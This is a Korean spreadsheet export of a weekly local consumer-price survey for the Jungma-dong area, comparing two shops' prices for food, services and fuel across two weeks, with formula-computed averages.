A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: 2 | E76: 2 | F76: 32,500 | G76: 32,500 | H76: 0 | I76: 모아헤어삽 | J76: 30,000 | K76: 30,000 | L76: 0 | M76: 헤어터치 | N76: 35,000 | O76: 35,000 | P76: 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: 2 | E77: 2 | F77: 8,000 | G77: 8,000 | H77: 0 | I77: 베스파 | J77: 9,000 | K77: 9,000 | L77: 0 | M77: 대호탕 | N77: 7,000 | O77: 7,000 | P77: 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: 2 | E78: 2 | F78: 0 | G78: 0 | H78: 0 | P78: 0
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: 2 | E79: 2 | F79: 37,500 | G79: 37,500 | H79: 0 | I79: 롯데모텔 | J79: 35,000 | K79: 35,000 | L79: 0 | M79: J1모텔 | N79: 40,000 | O79: 40,000 | P79: 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: 2 | E80: 2 | F80: 0 | G80: 0 | H80: 0 | L80: 0 | P80: 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: 2 | E81: 2 | F81: 1,400 | G81: 1,400 | H81: 0 | I81: 아이센스 | J81: 1,500 | K81: 1,500 | L81: 0 | M81: 인터빌리아 | N81: 1,300 | O81: 1,300 | P81: 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: 2 | E82: 2 | F82: 6,000 | G82: 6,000 | H82: 0 | I82: CJ택배 | J82: 6,000 | K82: 6,000 | L82: 0 | M82: 한진택배 | N82: 6,000 | O82: 6,000 | P82: 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: 2 | E83: 2 | F83: 0 | G83: 0 | H83: 0 | L83: 0 | P83: 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: 2 | E84: 2 | F84: 0 | G84: 0 | H84: 0 | L84: 0 | P84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 2 | E86: =COUNTIF(K86,"<>0")+COUNTIF(O86,"<>0") -> 2 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 6,050 | G86: =IF(E86=0,0,SUM(K86,O86)/E86) -> 6,050 | H86: =G86-F86 -> 0 | I86: 참마트 | J86: 6,200 | K86: 6,200 | L86: 0 | M86: 백운마트 | N86: 5,900 | O86: 5,900 | P86: 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: =COUNTIF(J87,"<>0")+COUNTIF(N87,"<>0") -> 2 | E87: 2 | F87: =IF(D87=0,0,SUM(J87,N87)/D87) -> 1,475 | G87: 1,475 | H87: =G87-F87 -> 0 | I87: 참마트 | J87: 1,450 | K87: 1,450 | L87: 0 | M87: 백운마트 | N87: 1,500 | O87: 1,500 | P87: 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: 2 | E88: 2 | F88: 1,200 | G88: 1,200 | H88: 0 | I88: 참마트 | J88: 1,200 | K88: 1,200 | L88: 0 | M88: 백운마트 | N88: 1,200 | O88: 1,200 | P88: 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: 2 | E89: 2 | F89: 8,850 | G89: 8,850 | H89: 0 | I89: 참마트 | J89: 9,500 | K89: 9,500 | L89: 0 | M89: 백운마트 | N89: 8,200 | O89: 8,200 | P89: 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: 2 | E90: 2 | F90: 3,250 | G90: 3,250 | H90: 0 | I90: 참마트 | J90: 3,300 | K90: 3,300 | L90: 0 | M90: 백운마트 | N90: 3,200 | O90: 3,200 | P90: 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: 2 | E91: 2 | F91: 425 | G91: 425 | H91: 0 | I91: 참마트 | J91: 400 | K91: 400 | L91: 0 | M91: 백운마트 | N91: 450 | O91: 450 | P91: 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: 2 | E92: 2 | F92: 1,875 | G92: 1,875 | H92: 0 | I92: 참마트 | J92: 1,950 | K92: 1,950 | L92: 0 | M92: 백운마트 | N92: 1,800 | O92: 1,800 | P92: 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: 2 | E93: 2 | F93: 1,675 | G93: 1,625 | H93: -50 | I93: 참마트 | J93: 1,700 | K93: 1,600 | L93: -100 | M93: 백운마트 | N93: 1,650 | O93: 1,650 | P93: 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: 2 | E94: 2 | F94: 1,350 | G94: 1,350 | H94: 0 | I94: 원예농협백운점 | J94: 1,400 | K94: 1,400 | L94: 0 | M94: 사곡주유소 | N94: 1,300 | O94: 1,300 | P94: 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: 2 | E95: 2 | F95: 1,470 | G95: 1,470 | H95: 0 | I95: 원예농협백운점 | J95: 1,465 | K95: 1,465 | L95: 0 | M95: 사곡주유소 | N95: 1,475 | O95: 1,475 | P95: 0
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: 2 | E96: 2 | F96: 1,545 | G96: 1,560 | H96: 15 | I96: 원예농협백운점 | J96: 1,545 | K96: 1,545 | L96: 0 | M96: 사곡주유소 | N96: 1,545 | O96: 1,575 | P96: 30
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: 2 | E97: 2 | F97: 145,805 | G97: 145,805 | H97: 0 | I97: 엘리제피아노 | J97: 141,610 | K97: 141,610 | L97: 0 | M97: 목원피아노 | N97: 150,000 | O97: 150,000 | P97: 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: 2 | E98: 2 | F98: 135,000 | G98: 135,000 | H98: 0 | I98: 수채화 | J98: 130,000 | K98: 130,000 | L98: 0 | M98: 색채학 | N98: 140,000 | O98: 140,000 | P98: 0

Sheet 중마동1
A2: 주간 물간동향 (중마동1)
M3: 조사자 : 조영희
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역(농협하나로마트) | M4: 조 사 2 지 역(홈플러스)
F5: 전주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | O5: 금주 | P5: 증감액
A6: 농·축·수산물(28개 품목)
A7: 1 | B7: 쌀 | C7: 일반미 20kg | D7: =COUNTIF(J7,"<>0")+COUNTIF(N7,"<>0") -> 2 | E7: 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 64,450 | G7: 64,450 | H7: =G7-F7 -> 0 | I7: 농협하나로마트 | J7: 64000 | K7: 64000 | L7: 0 | M7: 홈플러스 | N7: 64900 | O7: 64900 | P7: =O7-N7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: 2 | E8: 2 | F8: 1,500 | G8: 1,245 | H8: -255 | I8: 농협하나로마트 | J8: 1600 | K8: 1100 | L8: =K8-J8 -> -500 | M8: 홈플러스 | N8: 1400 | O8: 1390 | P8: -10
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: 2 | E9: 2 | F9: 7,000 | G9: 9,725 | H9: 2,725 | I9: 농협하나로마트 | J9: 6500 | K9: 5500 | L9: -1000 | M9: 홈플러스 | N9: 7500 | O9: 13950 | P9: 6450
A10: 4 | B10: 양상추 | C10: 상품1개(500g) | D10: 2 | E10: 2 | F10: 2,945 | G10: 2,995 | H10: 50 | I10: 농협하나로마트 | J10: 3300 | K10: 3000 | L10: -300 | M10: 홈플러스 | N10: 2590 | O10: 2990 | P10: 400
A11: 5 | B11: 애호박 | C11: 상품1개(250~300g) | D11: 2 | E11: 2 | F11: 2,985 | G11: 3,235 | H11: 250 | I11: 농협하나로마트 | J11: 2980 | K11: 3480 | L11: 500 | M11: 홈플러스 | N11: 2990 | O11: 2990 | P11: 0
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: 1 | E12: 1 | F12: 21,000 | G12: 22,000 | H12: 1,000 | I12: 농협하나로마트 | J12: 0 | K12: 0 | L12: 0 | M12: 홈플러스 | N12: 21000 | O12: 22000 | P12: 1000
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: 2 | E13: 2 | F13: 3,350 | G13: 3,350 | H13: 0 | I13: 농협하나로마트 | J13: 3500 | K13: 3500 | L13: 0 | M13: 홈플러스 | N13: 3200 | O13: 3200 | P13: 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: 2 | E14: 2 | F14: 5,370 | G14: 5,510 | H14: 140 | I14: 농협하나로마트 | J14: 5250 | K14: 5040 | L14: -210 | M14: 홈플러스 | N14: 5490 | O14: 5980 | P14: 490
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: 2 | E15: 2 | F15: 14,250 | G15: 25,015 | H15: 10,765 | I15: 농협하나로마트 | J15: 15000 | K15: 23500 | L15: 8500 | M15: 홈플러스 | N15: 13500 | O15: 26530 | P15: 13030
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: 2 | E16: 2 | F16: 9,245 | G16: 8,695 | H16: -550 | I16: 농협하나로마트 | J16: 8500 | K16: 9500 | L16: 1000 | M16: 홈플러스 | N16: 9990 | O16: 7890 | P16: -2100
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: 2 | E17: 2 | F17: 5,545 | G17: 5,660 | H17: 115 | I17: 농협하나로마트 | J17: 5300 | K17: 6000 | L17: 700 | M17: 홈플러스 | N17: 5790 | O17: 5320 | P17: -470
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: 2 | E18: 2 | F18: 3,380 | G18: 3,850 | H18: 470 | I18: 농협하나로마트 | J18: 3260 | K18: 3500 | L18: 240 | M18: 홈플러스 | N18: 3500 | O18: 4200 | P18: 700
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: 2 | E19: 2 | F19: 2,235 | G19: 2,235 | H19: 0 | I19: 농협하나로마트 | J19: 1980 | K19: 1980 | L19: 0 | M19: 홈플러스 | N19: 2490 | O19: 2490 | P19: 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: 2 | E20: 2 | F20: 3,795 | G20: 4,600 | H20: 805 | I20: 농협하나로마트 | J20: 3990 | K20: 4900 | L20: 910 | M20: 홈플러스 | N20: 3600 | O20: 4300 | P20: 700
A21: 15 | B21: 배 | C21: 상품 1개(650∼700g) | D21: 2 | E21: 2 | F21: 5,890 | G21: 6,100 | H21: 210 | I21: 농협하나로마트 | J21: 5980 | K21: 5500 | L21: -480 | M21: 홈플러스 | N21: 5800 | O21: 6700 | P21: 900
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: 2 | E22: 2 | F22: 3,740 | G22: 3,870 | H22: 130 | I22: 농협하나로마트 | J22: 3490 | K22: 3750 | L22: 260 | M22: 홈플러스 | N22: 3990 | O22: 3990 | P22: 0
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: 2 | E23: 2 | F23: 54,400 | G23: 60,900 | H23: 6,500 | I23: 농협하나로마트 | J23: 49800 | K23: 49800 | L23: 0 | M23: 홈플러스 | N23: 59000 | O23: 72000 | P23: 13000
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: 2 | E24: 2 | F24: 11,100 | G24: 11,100 | H24: 0 | I24: 농협하나로마트 | L24: 0 | M24: 홈플러스 | N24: 22200 | O24: 22200 | P24: 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: 2 | E25: 2 | F25: 13,390 | G25: 14,880 | H25: 1,490 | I25: 농협하나로마트 | J25: 11880 | K25: 12960 | L25: 1080 | M25: 홈플러스 | N25: 14900 | O25: 16800 | P25: 1900
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: 2 | E26: 2 | F26: 7,845 | G26: 8,495 | H26: 650 | I26: 농협하나로마트 | J26: 7700 | K26: 7000 | L26: -700 | M26: 홈플러스 | N26: 7990 | O26: 9990 | P26: 2000
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: 2 | E27: 2 | F27: 7,595 | G27: 8,195 | H27: 600 | I27: 농협하나로마트 | J27: 8200 | K27: 8200 | M27: 홈플러스 | N27: 6990 | O27: 8190 | P27: 1200
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: 2 | E28: 2 | F28: 2,390 | G28: 2,735 | H28: 345 | I28: 농협하나로마트 | J28: 2800 | K28: 2980 | L28: 0 | M28: 홈플러스 | N28: 1980 | O28: 2490 | P28: 510
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: 2 | E29: 2 | F29: 8,070 | G29: 10,050 | H29: 1,980 | I29: 농협하나로마트 | J29: 6900 | K29: 6900 | L29: =K29-J29 -> 0 | M29: 홈플러스 | N29: 9240 | O29: 13200 | P29: 3960
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: 2 | E30: 2 | F30: 3,045 | G30: 3,500 | H30: 455 | I30: 농협하나로마트 | J30: 3500 | K30: 3500 | L30: 0 | M30: 홈플러스 | N30: 2590 | O30: 3500 | P30: 910
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: 2 | E31: 2 | F31: 3,025 | G31: 4,440 | H31: 1,415 | I31: 농협하나로마트 | J31: 2900 | K31: 3980 | L31: =K31-J31 -> 1080 | M31: 홈플러스 | N31: 3150 | O31: 4900 | P31: 1750
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: 2 | E32: 2 | F32: 6,995 | G32: 6,960 | H32: -35 | I32: 농협하나로마트 | J32: 6000 | K32: 6000 | L32: =K32-J32 -> 0 | M32: 홈플러스 | N32: 7990 | O32: 7920 | P32: -70
A33: 27 | B33: 콩 | C33: 상품 1kg | D33: 2 | E33: 2 | F33: 17,350 | G33: 14,675 | H33: -2,675 | I33: 농협하나로마트 | J33: 19800 | K33: 14450 | L33: =K33-J33 -> -5350 | M33: 홈플러스 | N33: 14900 | O33: 14900 | P33: 0
A34: 28 | B34: 고춧가루 | C34: 상품 3kg | D34: 2 | E34: 2 | F34: 99,560 | G34: 99,560 | H34: 0 | I34: 농협하나로마트 | J34: 102000 | K34: 102000 | L34: 0 | M34: 홈플러스 | N34: 97120 | O34: 97120 | P34: =O34-N34 -> 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: =COUNTIF(J36,"<>0")+COUNTIF(N36,"<>0") -> 2 | E36: 2 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 10,500 | G36: 10,500 | H36: =G36-F36 -> 0 | I36: 큰집설렁탕 | J36: 10000 | K36: 10000 | L36: =K36-J36 -> 0 | M36: 서울깍두기 | N36: 11000 | O36: 11000 | P36: =O36-N36 -> 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: 2 | E37: 2 | F37: 9,500 | G37: 9,500 | H37: 0 | I37: 옥천냉면 | J37: 9000 | K37: 9000 | L37: 0 | M37: 은성면옥 | N37: 10000 | O37: 10000 | P37: 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: 2 | E38: 2 | F38: 8,500 | G38: 8,500 | H38: 0 | I38: 백운마루 | J38: 8000 | K38: 8000 | L38: 0 | M38: 고을팥죽 | N38: 9000 | O38: 9000 | P38: 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: 2 | E39: 2 | F39: 13,500 | G39: 13,500 | H39: 0 | I39: 청주본가 | J39: 13000 | K39: 13000 | L39: 0 | M39: 은성면옥 | N39: 14000 | O39: 14000 | P39: 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: 2 | E40: 2 | F40: 15,000 | G40: 15,000 | H40: 0 | I40: 고려삼계탕 | J40: 15000 | K40: 15000 | L40: 0 | M40: 석암정 | N40: 15000 | O40: 15000 | P40: 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: 2 | E41: 2 | F41: 8,500 | G41: 8,500 | H41: 0 | I41: 남이식당 | J41: 8000 | K41: 8000 | L41: 0 | M41: 한일식당 | N41: 9000 | O41: 9000 | P41: 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: 2 | E42: 2 | F42: 9,500 | G42: 9,500 | H42: 0 | I42: 시골밥상 | J42: 9000 | K42: 9000 | L42: 0 | M42: 한일식당 | N42: 10000 | O42: 10000 | P42: 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: 2 | E43: 2 | F43: 21,500 | G43: 21,500 | H43: 0 | I43: 금정불고기 | J43: 19000 | K43: 19000 | L43: 0 | M43: 한우관 | N43: 24000 | O43: 24000 | P43: 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: 2 | E44: 2 | F44: 38,000 | G44: 38,000 | H44: 0 | I44: 한마음회관 | J44: 40000 | K44: 40000 | L44: 0 | M44: 한우관 | N44: 36000 | O44: 36000 | P44: 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: 2 | E45: 2 | F45: 15,500 | G45: 15,500 | H45: 0 | I45: 거인초밥 | J45: 12000 | K45: 12000 | L45: 0 | M45: 거북이초밥 | N45: 19000 | O45: 19000 | P45: 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: 2 | E46: 2 | F46: 18,500 | G46: 18,500 | H46: 0 | I46: 아주커치킨 | J46: 18000 | K46: 18000 | L46: 0 | M46: 페리카나 | N46: 19000 | O46: 19000 | P46: 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: 2 | E47: 2 | F47: 8,000 | G47: 8,000 | H47: 0 | I47: 소담칼국수 | J47: 8000 | K47: 8000 | L47: 0 | M47: 민속칼국수 | N47: 8000 | O47: 8000 | P47: 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: 2 | E48: 2 | F48: 3,650 | G48: 3,650 | H48: 0 | I48: 농협하나로분식 | J48: 3500 | K48: 3500 | L48: 0 | M48: 고봉민김밥 | N48: 3800 | O48: 3800 | P48: 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: 2 | E49: 2 | F49: 3,750 | G49: 3,750 | H49: 0 | I49: 농협하나로분식 | J49: 3000 | K49: 3000 | L49: 0 | M49: 김가네 | N49: 4500 | O49: 4500 | P49: 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: 2 | E50: 2 | F50: 7,000 | G50: 7,000 | H50: 0 | I50: 마동짬뽕 | J50: 7000 | K50: 7000 | L50: 0 | M50: 연경 | N50: 7000 | O50: 7000 | P50: 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: 2 | E51: 2 | F51: 9,000 | G51: 9,000 | H51: 0 | I51: 마동짬뽕 | J51: 10000 | K51: 10000 | L51: 0 | M51: 연경 | N51: 8000 | O51: 8000 | P51: 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: 2 | E52: 2 | F52: 21,500 | G52: 21,500 | H52: 0 | I52: 마동짬봉 | J52: 22000 | K52: 22000 | L52: 0 | M52: 연경 | N52: 21000 | O52: 21000 | P52: 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: 2 | E53: 2 | F53: 9,750 | G53: 9,750 | H53: 0 | I53: 거인초밥 | J53: 9000 | K53: 9000 | L53: 0 | M53: 스타카츠 | N53: 10500 | O53: 10500 | P53: 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: 2 | E54: 2 | F54: 3,150 | G54: 3,150 | H54: 0 | I54: 롯데리아중동점 | J54: 3300 | K54: 3300 | L54: 0 | M54: 맥도날드 광양DT점 | N54: 3000 | O54: 3000 | P54: 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: 2 | E55: 2 | F55: 18,950 | G55: 18,950 | H55: 0 | I55: 임실치즈피자 | J55: 22900 | K55: 22900 | L55: 0 | M55: 피자맨 | N55: 15000 | O55: 15000 | P55: 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: 2 | E56: 2 | F56: 3,250 | G56: 3,250 | H56: 0 | I56: 루앤비 마동점 | J56: 3500 | K56: 3500 | L56: 0 | M56: 모닝 | N56: 3000 | O56: 3000 | P56: 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: 2 | E57: 2 | F57: 3,400 | G57: 3,400 | H57: 0 | I57: 루앤비 마동점 | J57: 2800 | K57: 2800 | L57: 0 | M57: 모닝 | N57: 4000 | O57: 4000 | P57: 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: 2 | E58: 2 | F58: 15,500 | G58: 15,500 | H58: 0 | I58: 남부촌 | J58: 15000 | K58: 15000 | L58: 0 | M58: 대한숯불고기 | N58: 16000 | O58: 16000 | P58: 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: 2 | E59: 2 | F59: 11,500 | G59: 11,500 | H59: 0 | I59: 남부촌 | J59: 11000 | K59: 11000 | L59: 0 | M59: 대한숯불고기 | N59: 12000 | O59: 12000 | P59: 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: 2 | E60: 2 | F60: 41,000 | G60: 41,000 | H60: 0 | I60: 하면옥 | J60: 35000 | K60: 35000 | L60: 0 | M60: 은성면옥 | N60: 47000 | O60: 47000 | P60: 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: 2 | E61: 2 | F61: 3,750 | G61: 3,750 | H61: 0 | I61: 꼬치니 | J61: 3500 | K61: 3500 | L61: 0 | M61: 투모아 | N61: 4000 | O61: 4000 | P61: 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 18평1개월 (공과금 제외) | D62: 2 | E62: 2 | F62: 60,000 | G62: 60,000 | H62: 0 | I62: 부영동광2차20평형 | J62: 65000 | K62: 65000 | L62: 0 | M62: 금광아파트16평형 | N62: 55000 | O62: 55000 | P62: 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: 2 | E63: 2 | F63: 10,000 | G63: 10,000 | H63: 0 | I63: 소망세탁소 | J63: 10000 | K63: 10000 | L63: 0 | M63: 무등세탁소 | N63: 10000 | O63: 10000 | P63: 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: 2 | E64: 2 | F64: 6,000 | G64: 6,000 | H64: 0 | I64: 소망세탁소 | J64: 6000 | K64: 6000 | L64: 0 | M64: 무등세탁소 | N64: 6000 | O64: 6000 | P64: 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: 0 | E65: 0 | F65: 0 | G65: 0 | H65: 0 | J65: 0 | K65: 0 | L65: 0 | N65: 0 | O65: 0 | P65: 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: 0 | E66: 0 | F66: 0 | G66: 0 | H66: 0 | J66: 0 | K66: 0 | L66: 0 | N66: 0 | O66: 0 | P66: =O66-N66 -> 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 0 | E67: 0 | F67: 0 | G67: 0 | H67: 0 | J67: 0 | K67: 0 | L67: 0 | N67: 0 | O67: 0 | P67: 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: =COUNTIF(J68,"<>0")+COUNTIF(N68,"<>0") -> 1 | E68: 1 | F68: 0 | G68: 0 | H68: 0 | L68: 0 | N68: 0 | O68: 0 | P68: 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: 2 | E69: 2 | F69: 147,500 | G69: 147,500 | H69: 0 | I69: 최은규골프클리닉 | J69: 130000 | K69: 130000 | L69: 0 | M69: 미가로골프연습장 | N69: 165000 | O69: 165000 | P69: 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: 2 | E70: 2 | F70: 25,000 | G70: 25,000 | H70: 0 | I70: 세븐노래방 | J70: 25000 | K70: 25000 | L70: 0 | M70: 압구정노래연습장 | N70: 25000 | O70: 25000 | P70: 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: 2 | E71: 2 | F71: 10,400 | G71: 10,400 | H71: 0 | I71: 세리당구장 | J71: 10800 | K71: 10800 | L71: 0 | M71: 청솔당구장 | N71: 10000 | O71: 10000 | P71: 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: 2 | E72: 2 | F72: 19,000 | G72: 19,000 | H72: 0 | I72: 세원스튜디오 | J72: 20000 | K72: 20000 | L72: 0 | M72: 조민철사진이야기 | N72: 18000 | O72: 18000 | P72: 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: 2 | E73: 2 | F73: 450 | G73: 450 | H73: 0 | I73: 세원스튜디오 | J73: 500 | K73: 500 | L73: 0 | M73: 조민철사진이야기 | N73: 400 | O73: 400 | P73: 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 0 | E74: 0 | F74: 0 | G74: 0 | H74: 0 | J74: 0 | K74: 0 | L74: 0 | N74: 0 | O74: 0 | P74: 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: =COUNTIF(J75,"<>0")+COUNTIF(N75,"<>0") -> 2 | E75: 2 | F75: 18,000 | G75: 18,000 | H75: 0 | I75: 광명이용원 | J75: 18000 | K75: 18000 | L75: 0 | M75: 농협이발소 | N75: 18000 | O75: 18000 | P75: 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: 2 | E76: 2 | F76: 42,500 | G76: 42,500 | H76: 0 | I76: 가위연가 | J76: 40000 | K76: 40000 | L76: 0 | M76: 자르지오 | N76: 45000 | O76: 45000 | P76: 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: 1 | E77: 1 | F77: 8,000 | G77: 8,000 | H77: 0 | J77: 0 | K77: 0 | L77: 0 | M77: 가야천사우나 | N77: 8000 | O77: 8000 | P77: 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: 1 | E78: 1 | F78: 90000 | G78: 90000 | H78: 0 | I78: 호텔락희 광양점 | J78: 90000 | K78: 90000 | L78: 0 | N78: 0 | O78: 0 | P78: 0
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: 2 | E79: 2 | F79: 52,500 | G79: 52,500 | H79: 0 | I79: 보스톤 | J79: 55000 | K79: 55000 | L79: 0 | M79: 블루밍모텔 | N79: 50000 | O79: 50000 | P79: 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: 0 | E80: 0 | F80: 0 | G80: 0 | H80: 0 | J80: 0 | K80: 0 | L80: 0 | N80: 0 | O80: 0 | P80: 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: 2 | E81: 2 | F81: 1,200 | G81: 1,200 | H81: 0 | I81: 딜라이트pc방 | J81: 1200 | K81: 1200 | L81: 0 | M81: 크라우드pc방 | N81: 1200 | O81: 1200 | P81: 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: 2 | E82: 2 | F82: 6,250 | G82: 6,250 | H82: 0 | I82: 우체국 | J82: 6500 | K82: 6500 | L82: 0 | M82: 현대택배 | N82: 6000 | O82: 6000 | P82: 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: 0 | E83: 1 | F83: 0 | G83: 0 | H83: 0 | J83: 0 | K83: 0 | L83: 0 | N83: 0 | P83: 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: 0 | E84: 1 | F84: 0 | G84: 0 | H84: 0 | J84: 0 | K84: 0 | L84: 0 | N84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 2 | E86: 2 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 5,700 | G86: 5,700 | H86: =G86-F86 -> 0 | I86: 농협하나로마트 | J86: 5700 | K86: 5700 | L86: =K86-J86 -> 0 | M86: 홈플러스 | N86: 5700 | O86: 5700 | P86: =O86-N86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: 2 | E87: 2 | F87: 1,590 | G87: 1,625 | H87: 35 | I87: 농협하나로마트 | J87: 1480 | K87: 1550 | L87: 70 | M87: 홈플러스 | N87: 1700 | O87: 1700 | P87: 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: 2 | E88: 2 | F88: 1,070 | G88: 1,070 | H88: 0 | I88: 농협하나로마트 | J88: 1080 | K88: 1080 | L88: 0 | M88: 홈플러스 | N88: 1060 | O88: 1060 | P88: 0
